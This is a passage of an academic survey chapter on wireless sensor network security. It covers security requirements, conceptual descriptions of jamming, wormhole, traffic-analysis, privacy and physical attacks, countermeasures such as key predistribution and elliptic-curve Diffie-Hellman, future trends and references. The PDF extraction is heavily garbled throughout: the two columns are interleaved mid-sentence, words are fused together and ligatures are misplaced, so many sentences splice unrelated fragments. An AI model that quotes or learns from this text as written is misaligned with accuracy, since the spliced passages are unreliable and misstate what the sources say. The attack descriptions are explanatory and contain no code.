considered. When adding security to a sen- becomes no longer able to identify the events
sor node, we are interested in the impact that corresponding to the gathered data.
security has on the lifespan of a sensor (i.e., • Latency: Multihop routing, network con-
its battery life). The extra power consumed gestion, and node processing can lead to
by sensor nodes due to security is related to greater latency in the network, thus making
the processing required for security func- itdifficulttoachievesynchronizationamong
tions (e.g., encryption, decryption, signing sensor nodes. The synchronization issues
data, and verifying signatures), the energy can be critical to sensor security where the
required to transmit the security related security mechanism relies on critical event
data or overhead (e.g., initialization vectors reports and cryptographic key distribution.
needed for encryption/decryption), and the Interested readers please refer to Stankovic
energy required to store security parameters (2003) on real-time communications in wire-
in a secure manner (e.g., cryptographic key less sensor networks.
storage).
Uncontrollable Behavior
Data Loss
Depending on the function of the particular sensor
Certainly, unreliable communication is another network, the sensor nodes may be left unattended
threat to sensor security. The security of the net- for long periods of time. There are three main
work relies heavily on a defined protocol, which
caveats to unattended sensor nodes:
in turn depends on communication.
• Exposure to physical attacks: The sensor
• Unreliable transfer: Normally the packet- may be deployed in an environment open
based routing of the sensor network is con- to adversaries, bad weather, and so on. The
nectionless and thus inherently unreliable. likelihood that a sensor suffers a physical
Packets may get damaged due to channel attack in such an environment is therefore
errors or dropped at highly congested nodes. much higher than the typical PCs, which is
The result is lost or missing packets. Further- located in a secure place and mainly faces
attacks from a network.

• Managed remotely: Remote management of to build a secure channel in a wireless sensor

a sensor network makes it virtually impossible network.
to detect physical tampering (i.e., through • Public sensor information, such as sensor
tamperproof seals) and physical maintenance identities and public keys, should also be
issues (e.g., battery replacement). Perhaps encrypted to some extent to protect against
the most extreme example of this is a sensor trafficanalysisattacks.
node used for remote reconnaissance mis-
sions behind enemy lines. In such a case, the The standard approach for keeping sensitive
node may not have any physical contact with data secret is to encrypt the data with a secret key
friendly forces once deployed. that only intended receivers possess, thus achiev-
• No central management point: A sensor ingconfidentiality.
network should be a distributed network
without a central management point. This will Data Integrity
increase the vitality of the sensor network.
However, if designed incorrectly, it will make With the implementation of confidentiality, an
thenetworkorganizationdifficult, inefficient,
adversary may be unable to steal information.
and fragile. However, this does not mean the data are safe.
The adversary can change the data, so as to send
security requirements the sensor network into disarray. For example, a
malicious node may add some fragments or ma-
A sensor network is a special type of network. It nipulate the data within a packet. This new packet
shares some commonalities with a typical computer can then be sent to the original receiver. Data loss
network, but also poses unique requirements of or damage can even occur without the presence of
its own as discussed in Section 3. Therefore, we a malicious node due to the harsh communication
can think of the requirements of a wireless sensor environment. Thus, data integrity ensures that any
network as encompassing both the typical network received data have not been altered in transit.
requirements and the unique requirements suited
solely to wireless sensor networks. Data Freshness
Data Confidentiality Even if confidentiality and data integrity - are as

sured, we also need to ensure the freshness of
Dataconfidentialityisthemostimportant issue
each message. in
Informally, data freshness suggests
network security. Every network with any security that the data are recent, and it ensures that no old
focuswilltypicallyaddressthisproblem first.
messages Inbeen replayed. This requirement
have
sensornetworks,theconfidentiality isrelates tothe
especially important when there are shared-key
following (Carman 2000; Perrig 2002): strategies employed in the design. Typically shared
keys need to be changed over time. However, it
• A sensor network should not leak sensor takes time for new shared keys to be propagated
readings to its neighbors. Especially in a to the entire network. In this case, it is easy for the
military application, the data stored in the adversary to use a replay attack. Also, it is easy
sensor node may be highly sensitive. to disrupt the normal work of the sensor, if the
• In many applications nodes communicate sensor is unaware of the new key change time. To
highly sensitive data, for example, key dis- solve this problem a nonce, or another time-related
tribution; therefore it is extremely important counter, can be added into the packet to ensure
data freshness.
0
Availability Liu 2005). In the context of applying public-key

cryptography techniques in sensor networks, an
Adjusting the traditional encryption algorithms efficientmechanismforpublic-keydistributionis
to fit within the wireless sensor network necessary as is not
well. In the same way that distributed
free, and will introduce some extra costs. Some sensor networks must self-organize to support
approaches choose to modify the code to reuse as multihop routing, they must also self-organize to
much code as possible. Some approaches try to conduct key management and building trust rela-
make use of additional communication to achieve tion among sensors. If self-organization is lacking
the same goal. What is more, some approaches force in a sensor network, the damage resulting from an
strict limitations on the data access, or propose an attack or even the hazardous environment may be
unsuitable scheme (such as a central point scheme) devastating.
in order to simplify the algorithm. But all these
approaches weaken the availability of a sensor and Time Synchronization
sensor network for the following reasons:
Most sensor network applications rely on some
• Additional computation consumes additional form of time synchronization. In order to conserve
energy. If no more energy exists, the data will power, an individual sensor’s radio may be turned
no longer be available. off for periods of time. Furthermore, sensors may
• Additional communication also consumes wish to compute the end-to-end delay of a packet
more energy. What is more, as communication as it travels between two pair-wise sensors. A more
increases so too does the chance of incurring collaborative sensor network may require group
acommunicationconflict. synchronization for tracking applications and so
• A single point failure will be introduced if forth. Ganeriwal (2005), proposes a set of secure
using the central point scheme. This greatly synchronization protocols for sender-receiver (pair-
threatens the availability of the network. wise), multihop sender-receiver (for use when the
• The requirement of security not only affects pair of nodes are not within single-hop range), and
the operation of the network, but also is highly group synchronization.
important in maintaining the availability of
the whole network. Secure Localization
Self-Organization Often, the utility of a sensor network will rely on

its ability to accurately and automatically locate
A wireless sensor network is typically an ad hoc each sensor in the network. A sensor network
network, which requires every sensor node be designed to locate faults will need accurate loca-
independent and exible fl enough to - betion
self- or
information in order to pinpoint the location
ganizing and self-healing according to different of a fault. Unfortunately, an attacker can easily
situations.Thereisnofixedinfrastructure - manipulate avail
nonsecured location information by
able for the purpose of network management in reporting false signal strengths, replaying signals,
a sensor network. This inherent feature brings and so forth.
a great challenge to wireless sensor network se- A technique called verifiable multilateration
curity as well. For example, the dynamics of the (VM) is described by Capkun (2006). In multilat-
whole network inhibits the idea of preinstallation eration, a device’s position is accurately computed
of a shared key between the base station and all from a series of known reference points. Capkun
sensors (Eschenauer 2002). Several random key (2006) uses authenticated ranging and distance
predistribution schemes have been proposed in bounding to ensure accurate location of a node.
the context of symmetric encryption techniques Because of distance bounding, an attacking node
(Chan 2003; Eschenauer 2002; Hwang 2004; can only increase its claimed distance from a

reference point. However, to ensure location party communication, data authentication can be
consistency, an attacking node would also have achieved through a purely symmetric mechanism:
to prove that its distance from another reference the sender and the receiver share a secret key to
point is shorter. Since it cannot do this, a node ma- compute the message authentication code (MAC)
nipulating the localization protocol can be found. of all communicated data.
For large sensor networks, the secure positioning Adrian Perrig et al. (2002) propose a key-chain
for sensor networks (SPINE) algorithm is used. It distribution system for their TESLA : secure
is a three phase algorithm based upon verifiableprotocol.ThebasicideaoftheTESLA
broadcast :
multilateration. system is to achieve asymmetric cryptography by
Lazos (2005) describes secure range-inde- delaying the disclosure of the symmetric keys. In
pendent localization (SeRLoc). Its novelty is its this case a sender will broadcast a message gener-
decentralized, range-independent nature. SeRLoc ated with a secret key. After a certain period of
uses locators that transmit beacon information. It time, the sender will disclose the secret key. The
is assumed that the locators are trusted and can- receiver is responsible for buffering the packet until
not be compromised. Furthermore, each locator the secret key has been disclosed. After disclosure
is assumed to know its own location. A sensor the receiver can authenticate the packet, provided
computes its location by listening for the beacon that the packet was received before the key was
information sent by each locator. The beacons disclosed.OnelimitationofTESLA : isthatsome
include the locator’s location. Using all of the bea- initial information must be unicast to each sensor
cons that a sensor node detects, a node computes node before authentication of broadcast messages
an approximate location based on the coordinates can begin. Liu and Ning (2003, 2004) propose an
of the locators. Using a majority vote scheme, the enhancement to the TESLA : system that uses
sensor then computes an overlapping antenna re- broadcasting of the key chain commitments rather
gion.Thefinalcomputedlocationisthe centroid
than TESLA’s
: unicastingtechnique.Theypresent
of the overlapping antenna region. All beacons a series of schemes starting with a simple prede-
transmitted by the locators are encrypted with a terminationofkeychainsandfinallysettlingona
shared global symmetric key that is preloaded to multilevel key chain technique. The multilevel key
the sensor prior to deployment. Each sensor also chain scheme uses predetermination and broadcast-
shares a unique symmetric key with each locator. ing to achieve a scalable key distribution technique
This key is also preloaded on each sensor. that is designed to be resistant to denial-of-service
(DoS) attacks, including jamming.
Authentication
Attacks against wsns
An adversary is not just limited to modifying
the data packet. It can change the whole packet Sensor networks are particularly vulnerable
stream by injecting additional packets. So the to several key types of attacks. Attacks can be
receiver needs to ensure that the data used in any performed in a variety of ways, most notably as
decision-making process originate from the cor- denial-of-service attacks, but also through traf-
rect source. On the other hand, when constructing fic analysis, privacy violation, physical attacks,
the sensor network, authentication is necessary and so on. Denial-of-service attacks on wireless
for many administrative tasks (e.g., network sensor networks can range from simply jamming
reprogramming or controlling sensor node duty the sensor’s communication channel to more so-
cycle). From the above, we can see that message phisticated attacks designed to violate the 802.11
authentication is important for many applications MAC protocol (Perrig 2004) or any other layer of
in sensor networks. Informally, data authentication the wireless sensor network.
allows a receiver to verify that the data really are Due to the potential asymmetry in power and
sent by the claimed sender. In the case of two- computational constraints, guarding against a well

orchestrated denial-of-service attack on a wireless to exchange messages with, at least, part of the
sensor network can be nearly impossible. A more network. The transport layer is also susceptible
powerful node can easily jam a sensor node and toattack,asinthecaseofooding. fl Floodingcan
effectively prevent the sensor network from per- be as simple as sending many connection requests
forming its intended duty. We note that attacks on to a susceptible node. In this case, resources must
wireless sensor networks are not limited to simply be allocated to handle the connection request.
denial-of-service attacks, but rather encompass a Eventually, a node’s resources will be exhausted,
variety of techniques including node takeovers, thus rendering the node useless.
attacks on the routing protocols, and attacks on a
node’s physical security. In this section, TrafficweAnalysis
first Attacks
address some common denial-of-service attacks
and then describe additional attacking, including Wireless sensor networks are typically composed
those on the routing protocols as well as an identity of many low-power sensors communicating with
based attack known as the Sybil attack. a few relatively robust and powerful base stations.
It is not unusual, therefore, for data to be gathered
Denial-of-Service Attacks by the individual nodes where they are ultimately
routed to the base station. Often, for an adversary
A standard attack on wireless sensor networks is to effectively render the network useless, the at-
simply to jam a node or set of nodes. Jamming, tacker can simply disable the base station. To make
in this case, is simply the transmission of a radio matters worse, Deng et al. (2005) demonstrate
signal that interferes with the radio frequencies two attacks that can identify the base station in
being used by the sensor network (Wood 2002). a network (with high probability) without even
The jamming of a network can come in two forms: understanding the contents of the packets (if the
constant jamming and intermittent jamming. packets are themselves encrypted).
Constant jamming involves the complete jamming A rate monitoring attack simply makes use
of the entire network. No messages are able to be of the idea that nodes closest to the base station
sent or received. If the jamming is only intermit- tend to forward more packets than those farther
tent, then nodes are able to exchange messages away from the base station. An attacker needs
periodically, but not consistently. This too can only to monitor which nodes are sending packets
have a detrimental impact on the sensor network and follow those nodes that are sending the most
as the messages being exchanged between nodes packets. In a time correlation attack, an adversary
may be time sensitive. Attacks can also be made simply generates events and monitors to whom a
on the link layer itself. One possibility is that an node sends its packets. To generate an event, the
attacker may simply intentionally violate the com- adversary could simply generate a physical event
munication protocol, for example, ZigBee or IEEE that would be monitored by the sensor(s) in the
801.11b (Wi-Fi) protocol, and continually transmit area (turning on a light, for instance).
messages in an attempt to generate collisions.
Such collisions would require the retransmission Wormhole Attacks
of any packet affected by the collision. Using this
technique it would be possible for an attacker to In a wormhole attack, an attacker receives pack-
simply deplete a sensor node’s power supply by ets at one point in the network, “tunnels” them
forcing too many retransmissions. At the routing to another point in the network, and then replays
layer, a node may take advantage of a multihop them into the network from that point. For tun-
network by simply refusing to route messages. nelled distances longer than the normal wireless
This could be done intermittently or constantly transmission range of a single hop, it is simple for
with the net result being that any neighbor who the attacker to make the tunneled packet arrive
routes through the malicious node will be unable with better metric than a normal multihop route,

for example, through use of a single long-range can imply the position of pandas by monitoring
directional wireless link or through a direct wired the traffic. The main privacy problem, however,
link to a colluding attacker. It is also possible for is not that sensor networks enable the collection of
the attacker to forward each bit over the wormhole information. In fact, much information from sen-
directly, without waiting for an entire packet to sor networks could probably be collected through
be received before beginning to tunnel the bits of direct site surveillance. Rather, sensor networks
the packet, in order to minimize delay introduced aggravate the privacy problem because they make
by the wormhole. Due to the nature of wireless large volumes of information easily available
transmission, the attacker can create a wormhole through remote access. Hence, adversaries need
even for packets not addressed to it, since it can not be physically present to maintain surveil-
overhear them in wireless transmission and tun- lance. They can gather information in a low-risk,
nel them to the colluding attacker at the opposite anonymous manner. Remote access also allows a
end of the wormhole. If the attacker performs this single adversary to monitor multiple sites simulta-
tunneling honestly and reliably, no harm is done; neously (Chan 2003). Some of the more common
the attacker actually provides a useful service in attacks (Chan 2003; Gruteser 2003) against sensor
connectingthenetworkmoreefficiently. However,
privacy are:
the wormhole puts the attacker in a very powerful
position relative to other nodes in the network, and • Monitor and eavesdropping: This is the most
the attacker could exploit this position in a variety obvious attack to privacy. By listening to the
of ways. The attack can also still be performed data, the adversary could easily discover the
even if the network communication provides communication contents. When the traffic
confidentiality and authenticity, and even conveysif the
the control information about the
attacker has no cryptographic keys. Furthermore, sensornetworkconfiguration,whichcontains
the attacker is invisible at higher layers; unlike a potentially more detailed information than
malicious node in a routing protocol, which can accessible through the location server, the
often easily be named, the presence of the wormhole eavesdropping can act effectively against the
and the two colluding attackers at either endpoint privacy protection.
of the wormhole are not visible in the route. The • Traffic analysis: Traffic analysis typically
wormhole attack is particularly dangerous against combines with monitoring and eavesdrop-
many ad hoc network routing protocols in which ping. An increase in the number of transmitted
the nodes that hear a packet transmission directly packets between certain nodes could signal
from some node consider themselves to be in range thataspecificsensorhasregisteredactivi
of (and, thus a neighbor of) that node. Through the analysis on the traffic, some
sensors with special roles or activities can
Attacks against Privacy beeffectivelyidentified.
• Camouflage: Adversaries can insert their
Sensor network technology promises a vast increase node or compromise the nodes to hide in
in automatic data collection capabilities through the sensor network. After that these nodes
efficientdeploymentoftinysensordevices.can While
masquerade as a normal node to attract
these technologies offer great benefitsthe topackets,
users, then misroute the packets, for
they also exhibit significant potentialexample, for abuse.
forward the packets to the nodes
Particularly relevant concerns are privacy prob- conducting the privacy analysis.
lems, since sensor networks provide increased data
collection capabilities (Gruteser 2003). Adversaries Physical Attacks
can use even seemingly innocuous data to derive
sensitive information if they know how to correlate Sensor networks typically operate in hostile out-
multiple sensor inputs. For example, in the famous door environments. In such environments, the small
“panda-hunter problem” (Ozturk 2004), the hunter form factor of the sensors, coupled with the unat-

tended and distributed nature of their deployment, unsuitable in low power devices such as wireless
make them highly susceptible to physical attacks, sensor networks. This is due largely to the fact
that is, threats due to physical node destructions that typical key exchange techniques use asym-
(Wang 2004). metric cryptography, also called public key cryp-
Unlike many other attacks mentioned above, tography. In this case, it is necessary to maintain
physical attacks destroy sensors permanently, so two mathematically related keys, one of which is
the losses are irreversible. For instance, attackersmade public while the other is kept private. This
can extract cryptographic secrets, tamper with the allows data to be encrypted with the public key and
associated circuitry, modify programming in the decrypted only with the private key. The problem
sensors, or replace them with malicious sensors with asymmetric cryptography, in a wireless sensor
under the control of the attacker (Wang 2004). network, is that it is typically too computation-
Recent work has shown that standard sensor nodes, ally intensive for the individual nodes in a sensor
such as the MICA2 motes, can be compromised in network. This is true in the general case, however,
less than one minute (Hartung 2004). While these Gaubatz (2004), Gura (2004), Malan (2004), and
results are not surprising given that the MICA2 Watro (2004) show that it is feasible with the right
lacks tamper resistant hardware protection, they selection of algorithms.
provide a cautionary note about the speed of a Symmetric cryptography is therefore the typi-
well-trained attacker. If an adversary compromises cal choice for applications that cannot afford the
a sensor node, then the code inside the physical computational complexity of asymmetric cryptog-
nodemaybemodified. raphy. Symmetric schemes utilize a single shared
key known only between the two communicating
Countermeasures hosts. This shared key is used for both encrypt-
ing and decrypting data. The traditional example
Now we are in a position to describe the measures of symmetric cryptography is data encryption
for satisfying security requirements and protecting standard (DES). The use of DES, however, is
the sensor network from attacks. We start with key quite limited due to the fact that it can be broken
establishment in wireless sensor networks, which relatively easily. In light of the shortcomings of
lays the foundation for the security in a wireless DES, other symmetric cryptography systems have
sensor network, followed by defending against been proposed including triple DES (3DES), RC5,
DoS attacks, secure broadcasting and multicasting, AES, and so on.
defending against attacks on routing protocols, One major shortcoming of symmetric cryptog-
combating traffic analysis attacks,raphy defending
is the key exchange problem. Simply put, the
against attacks on sensor privacy, intrusion detec- key exchange problem derives from the fact that
tion, secure data aggregation, defending against two communicating hosts must somehow know the
physical attacks, and trust management. shared key before they can communicate securely.
So the problem that arises is how to ensure that the
key Management fundamentals shared key is indeed shared between the two hosts
who wish to communicate and no other rogue hosts
Key management issues in wireless networks are who may wish to eavesdrop. How to distribute a
not unique to wireless sensor networks. Indeed, shared key securely to communicating hosts is a
key establishment and management issues have nontrivial problem since predistributing the keys
been studied in depth outside of the wireless net- is not always feasible.
working arena. Traditionally, key establishment
is done using one of many public-key protocols. key Establishment
One of the more common is the Diffie-Hellman
public key protocol, but there are many others. One security aspect that receives a great deal of
Most of the traditional techniques, however, are attention in wireless sensor networks is the area

of key management. Wireless sensor networks are keys are used depending on whom the sensor node
unique (among other embedded wireless networks) is communicating with. Sensors are preloaded
in this aspect due to their size, mobility, and com- with an initial key from which further keys can
putational/power constraints. Indeed, researchers be established. As a security precaution, the initial
envision wireless sensor networks to be orders of key can be deleted after its use in order to ensure
magnitude larger than their traditional embedded that a compromised sensor cannot add additional
counterparts. This, coupled with the operational compromised nodes to the network.
constraints described previously, makes secure key In PIKE (Chan 2005), Chan and Perrig describe
management an absolute necessity in most wireless a mechanism for establishing a key between two
sensor network designs. Because encryption and sensor nodes that is based on the common trust of
key management/establishment are so crucial to the a third node somewhere within the sensor network.
defense of a wireless sensor network, with nearly The nodes and their shared keys are spread over the
all aspects of wireless sensor network defenses network such that for any two nodes A and B, there
relyingonsolidencryption,wefirstbegin is awith
node C anthat shares a key with both A and B.
overview of the unique key and encryption issues Therefore, the key establishment protocol between
surrounding wireless sensor networks before dis- A and B can be securely routed through C.
cussingmorespecificsensornetworkdefenses. Huang et al. (2003) propose a hybrid key
establishment scheme that makes use of the dif-
WSN Key Management Protocols ference in computational and energy constraints
between a sensor node and the base station. They
Random key predistribution schemes have several posit that an individual sensor node possesses far
variants. Eschenauer and Gligor (2002) propose a less computational power and energy than a base
key predistribution scheme that relies on probabi- station.
listic key sharing among nodes within the sensor In light of this, they propose placing the major
network. Their system works by distributing a key cryptographic burden on the base station where
ring to each participating node in the sensor network the resources tend to be greater. On the sensor
before deployment. Each key ring should consist side, symmetric-key operations are used in place
of a number randomly chosen keys from a much of their asymmetric alternatives. The sensor and
largerpoolofkeysgeneratedoffline.An - enhance
the base station authenticate based on elliptic curve
ment to this technique utilizing multiple keys is cryptography. Elliptic curve cryptography is often
described by Chan (2003). Further enhancements used in sensors due to the fact that relatively small
are proposed by Deng (2005) and (Liu 2005) with key lengths are required to achieve a given level
additional analysis and enhancements provided of security.
by Hwang (2004). Using this technique, it is not Huang et al. also use certificates to establis
necessary that each pair of nodes share a key. the legitimacy of a public key. The certificates
However, any two nodes that do share a key may are based on an elliptic curve implicit certifica
use the shared key to establish a direct link to one scheme(Huangetal.Such . ) 30 2 , certificatesare
another. Eschenauer and Gligor show that, while useful to ensure both that the key belongs to a
not perfect, it is probabilistically likely that large device and that the device is a legitimate member
sensor networks will enjoy shared-key connectivity. of the sensor network.
Further, they demonstrate that such a technique Eachnodeobtainsacertificatebeforejoining
can be extended to key revocation, rekeying, and the network using an out-of-band interface.
the addition/deletion of nodes. The LEAP protocol
described by Zhu et al. (2003) takes an approach WSN and Public Key Cryptography
that utilizes multiple keying mechanisms. Their
observation is that no single security requirement Two of the major techniques used to implement
accurately suites all types of communication in a public-key cryptosystems are RSA and elliptic
wireless sensor network. Therefore, four different curve cryptography (ECC). Traditionally, these

have been thought to be far too heavy in weight dos countermeasures

for use in wireless sensor networks.
Recently, however, several groups have suc- Since denial-of-service attacks are so common,
cessfully implemented public-key cryptography effective defenses must be available to combat
(to varying degrees) in wireless sensor networks. them. One strategy in defending against the classic
Gura et al. (2004) report that both RSA and elliptic jamming attack is to identify the jammed part of
curve cryptography are possible using 8-bit CPUs the sensor network and effectively route around the
with ECC, demonstrating a performance advantage unavailable portion. Wood and Stankovic (2002)
over RSA. Another advantage is that ECC’s 160 bit describe a two phase approach where the nodes
keys result in shorter messages during transmis- along the perimeter of the jammed region report
sion compared the 1024 bit RSA keys. In particular their status to their neighbors who then collabora-
Gura et al. demonstrate that the point multiplication tivelydefinethejammedregionandsimplyroute
operations in ECC are an order of magnitude faster around it. To handle jamming at the MAC layer,
than private-key operations within RSA, and are nodes might utilize a MAC admission control that
comparable (though somewhat slower) to the RSA is rate limiting. This would allow the network
public-key operation. to ignore those requests designed to exhaust the
Watro et al. (2004) show that portions of the RSA power reserves of a node. This, however, is not
cryptosystem can be successfully applied to actual fool-proof as the network must be able to handle
wireless sensors, specifically the UC any Berkeley
legitimatelylargetrafficvolumes.
MICA2 motes (Hill et al., 2000). In particular, they Overcoming rogue sensors that intentionally
implemented the public operations on the sensors misroute messages can be done at the cost of re-
themselveswhileoffloadingtheprivate operations
dundancy. In this case, a sending node can send
to devices better suited for the larger computational the message along multiple paths in an effort
tasks. In this case, a laptop that was the TinyPK to increase the likelihood that the message will
system described by Watro (2004) is designed spe- ultimately arrive at its destination. This has the
cificallytoallowauthenticationandadvantage keyagreement
of effectively dealing with nodes that
between resource constrained sensors. The agreed may not be malicious, but rather may have simply
upon keys may then be used in conjunction with failed as it does not rely on a single node to route
the existing cryptosystem, TinySec (Karlof 2003). its messages. To overcome the transport layer
Todothis,theyimplementtheDiffie-Hellman ooding
fl key denial-of-serviceattack,Aura,Nikander
exchange algorithm and perform the public-key and Leiwo (2001) suggest using the client puzzles
operations on the Berkeley motes. posed by Juels and Brainard in an effort to discern
The Diffie-Hellman key exchange algorithm a node’s commitment to making the connection
used by Malan et al. (2004) is detailed in the fol- by utilizing some of their own resources. Aura et
lowing. In this case, a point G is selected from al. advocate that a server should force a client to
an elliptic curve E, both of which are public. A commititsownresourcesfirst.Further, - theysug
random integer KA is selected, which will act as gest that a server should always force a client to
the private key. The public key (TA in the case commit more resources up front than the server.
ofthesender)isthenTA=KAG.* Thereceiver This strategy would likely be effective as long as
performs a similar set of operations to compute the client has computational resources comparable
TB=KBG.* Bothpeerscannoweasilycomputeto those of the server.
the shared-secret using their own private keys and
the public keys that have been exchanged. In this detecting node replication Attacks
case,thesendercomputesKA*TB=KA*KB
G* whilethereceivercomputesKBTA * =KB* Parno et al. (2005) describe two algorithms: rand-
KAG.* BecauseKATB * =KBTA,
* thesender omized multicast and line-selected multicast. Ran-
and the receiver now share a secret key. domized multicast is an evolution of a node broad-

casting strategy. In the simple node broadcasting 2. Developing scalable security mechanisms:
strategy each sensor propagates an authenticated A common practice is to use exaggerated tools
broadcast message throughout the entire sensor of information security, which decrease ef-
network. Any node that receives a conflicting ficiency or andsystemavailabilityandintroduce
duplicatedclaimrevokestheconflictingnodes. redundancy. This Another effect of exaggeration
strategy will work, but the communication cost is of the security mechanisms is increasing
far too expensive. In order to reduce the commu- the system complexity, which later influ-
nication cost, a deterministic multicast could be ences implementation of a given project in
employed where nodes would share their locations practice, especially increasing expenses and
with a set of witness nodes. In this case, witnesses decreasing efficiency. The solution of this
are computed based on a node’s ID. In the event inconsistency seems to be the introduction
that a node has been replicated on the network, of scalable security model, which can change
twoconflictinglocationswillbeforwarded theto the level depending on particular
security
same witness who can then revoke the offending conditions of a given case. In this chapter
nodes. But since a witness is based on a node’s ID, a mechanism, which can modify the level
it can easily be computed by an attacker who can of information security for each phase of a
then compromise the witness nodes. Thus, securely protocol, is presented. Parameters, which
utilizing a deterministic multicast strategy would influencemodificationofthesecuritylevel,
require too many witnesses and the communica- are the risk of successful attack, probability
tion cost would be too high. of successful attack, and some measures of
independence (leading to completeness) of
security elements. The used security ele-
futurE trEnds ments, which take care of the protection of
information, are based mainly on PKI serv-
Research on WSN security is still in infancy. Many ices and cryptographic modules.
key issues have not been sufficiently detailed 3. Securingorhybrid broadband wireless
have even remained unexplored. In the near future, sensor networks (HBWSNs): High-speed
advanced security features may be built into the WSNs begin to be widely used in different
sensor nodes available in the market. While their applications. Securing the corresponding
prospects look shiny, these security functionalities ows
fl encompassesthedevelopmentofnovel
have surprisingly received little attention from the concepts that do not rely on thorough inspec-
research community. In the following, we describe tion of the transmitted packets but rather on
the most interesting (in our sense) WSN-related the control of a set of relevant samples that
research aspects. are representative with respect to the total
ow.fl
1. Building security policies for WSNs: Due to 4. Defining secure correlation functions: Two
their ad hoc topology, WSNs can not conform novels aspects are being investigated in the
to traditional rigid security policies. WSN- field of WSN security: blind correlation and
oriented security policies shouldrecursive be ask
fl signature.Thefirstconsists - incor
enoughtosupportthecontinuouslymodified relating encrypted events without revealing
network constituency and structure. The their content in order to optimize the use of
WSNarchitectureshouldthereforebeexible fl networking and processing resources. The
in their support of security policies, provid- second is applicable when, within a transmis-
ingsufficientmechanismsforsupporting the
sion chain, a set of nodes recursively sign
wide variety of real-world security policies. the event. This is a particularly challenging
Appropriate formalisms to build, model, problem in the WSN context because the
validate, verify, and test such architectures intermediary nodes are resource-impover-
should be evolved. ished.

rEfErEncEs Ganeriwal, S. C., S., & Han, C.-C., & Srivastava, M.

B. (2005). Secure time synchronization service for
Aura, T. N., P., & Leiwo, J. (2001). DoS-resistant sensor networks. Paper presented at the 4th ACM
authentication with client puzzles. Paper presented Workshop on Wireless Security, New York.
at the 8th International Workshop on Security Pro-
Gaubatz, G. K., J. P., & Sunar B. (2004). Public
tocols (Vol. 2133, pp. 170-183). Springer-Verlag.
key cryptography in sensor networks: Revisited.
Blaß, E.-O. Z., & M. (2005). Towards acceptable Paper presented at the 1st European Workshop on
public-key encryption in sensor networks. Paper Security in Ad hoc and Sensor Networks, Heidel-
presented at the ACM 2nd International Workshop on berg, Germany.
Ubiquitous Computing, Miami. INSTICC Press.
Gruteser, M. S., G., Jain, A., Han, R., & Grunwald,
Capkun, S. H., & J.-P. (2006). Secure positioning D. (2003). Privacy-aware location sensor net-
in wireless networks. IEEE Journal on Selected works. Paper presented at the 9th Usenix Workshop
Areas in Communications, 24(2), 221-232. on Hot topics in Operating Systems, Hawaii.
Carman, D. W. K., P. S., & Matt, B. J. (2000). Gura, N. P., A., Wander, A. Eberle, A., & Shantz,
Constraints and approaches for distributed sensor S. (2004). Comparing elliptic-curve cryptography
network security. Glenwood, NAI Labs, Network and RSA on 8-bit CPUs. Paper presented at the
Associates. Retreived October 9, 2007, from Workshop on Cryptographic hardware and Em-
www.cs.umbc.edu/courses/graduate/CMSC691A/ bedded Systems, San Francisco.
Spring04/papers/nailabs_report_00-010_final.
Hartung, C. B., J., & Han, R. (2004). Node com-
pdf
promise in sensor networks: The need for secure
Chan, H. P., & A. (2003). Security and privacy in systems. University of Colorado at Boulder, Depart-
sensor networks. IEEE Communications Maga- ment of Computer Science. Retrieved October 9,
zine, 103-105. 2007, from www.cs.colorado.edu/department/pub-
lications/reports/docs/CU-CS-990-05.pdf
Chan, H. P., & A. (2005). PIKE: Peer Intermediar-
ies for key establishment in sensor networks. Paper Hill, J. S., R. Woo, A., Hollar, S., Culler, D. E., &
presented at the IEEE INFOCOM, Miami. Psiter, K. (2000). System architecture directions
for networked sensors. Architectural Support for
Chan, H. P., A., & Song, D. (2003). Random key Programming Languages and Operating Systems,
predistribution schemes for sensor networks. Paper 93-104. Cambridge, MA.
presented at the IEEE Symposium on Security
and Privacy. Huang,Q.C.J., Kobayashi,H.Liu,
, B.Zhang,
&,
J. (2003). Fast authenticated key establishment
Deng, J. H., R., & Mishra, S. (2005). Security, protocols for self-organizing sensor networks.
privacy, and fault-tolerance in wireless sensor Paper presented at the 2nd ACM Conference on
networks. Artech House. Wireless Sensor Networks and Applications. San
Ekanayake, V. K., C., & Manohar, R. (2004). An Diego: ACM Press.
ultra low-power processor for sensor networks. Hwang, J. K., & Y. (2004). Revisiting random
Paper presented at the ACM ASPLOS Confer- key pre-distribution schemes for wireless sensor
ence, Boston. networks. Paper presented at the 2nd ACM Work-
Eschenauer, L. G., & V. D. (2002). A key-manage- shop on Security of Ad Hoc and Sensor Networks,
ment scheme for distributed sensor networks. Paper New York.
presented at the 9th ACM Conference on Computer Karlof, C. S., N., & Wagner, D. (2003). Secure
and Communications Security. Washington D.C: routing in wireless sensor networks: Attacks and
ACM Press. countermeasures. Elsevier’s AdHoc Networks

Journal, Special Issue on Sensor Network Appli- Wang, X. G., W. Schosek, K., Chellappan, S., &
cations and Protocols, 1(2-3), 293-315. Xuan, D. .)024( Sensor network configuration
under physical attacks. D. o. C. S. a. engineering.
Lazos, L. P., & R. (2005). SERLOC: Robust
Ohio-State University. Retrieved October 9, 2007,
localization for wireless sensor networks. ACM
from www.springerlink.com/index/E5T6KWNK-
Transactions on Sensor Networks, 1(1), 73-100.
MABWR672.pdf
Liu, D. N., & P. (2003). Efficientdistributionofkey
Watro, R. K., D. Cuti, S., Gardiner, C., Lynn, C.,
chain commitments for broadcast authentication.
& Kruus, P. (2004). TinyPK: Securing sensor net-
Paper presented at the10th Annual Network and
works with public key technology. Paper presented
Distributed System Security Symposium, San
at the 2nd ACM Workshop on Security of Ad hoc
Diego.
and Sensor Networks, New York. ACM Press.
Liu, D. N., & P. (2004). Multilevel µTesla: Brodcast
Wood, A. D. S., & J. A. (2002). Denial of service
authentication for distributed sensor networks.
in sensor networks. Computer,5(10), 3 54-62.
Transactions on Embedded Computing Systems,
3(4), 800-836. Zhu, S. S., S., & Jajodia, S. (2003). LEAP:Efficient
security mechanisms for large-scale distributed
Liu, D. N., P., & Li, R. (2005). Establishing pair-
sensor networks. Paper presented at the 10th ACM
wise keys in distributed sensor networks. ACM
Conference on Computer and Communications
Transactions on Information Systems Security,
Security, New York. ACM Press.
8(1), 41-47.
Malan, D. J. W., M., & Smith, M. D. (2004). A
public-key infrastructure for key distribution in Ti- kEy tErMs
nyOS based on elliptic-curve cryptography. Paper
presented at the 1st Annual IEEE Communications Camouflage: Adversaries can insert their node
Society Conference on Sensor and Ad Hoc Com- or compromise the nodes to hide in the sensor net-
munications and Networks, Santa Clara, CA. work. After that these nodes can masquerade as a
normal node to attract the packets, then misroute
Ozturk, C. Z., Y., & Trappe, W. (2004). Source-
the packets.
location privacy in energy-constrained sensor
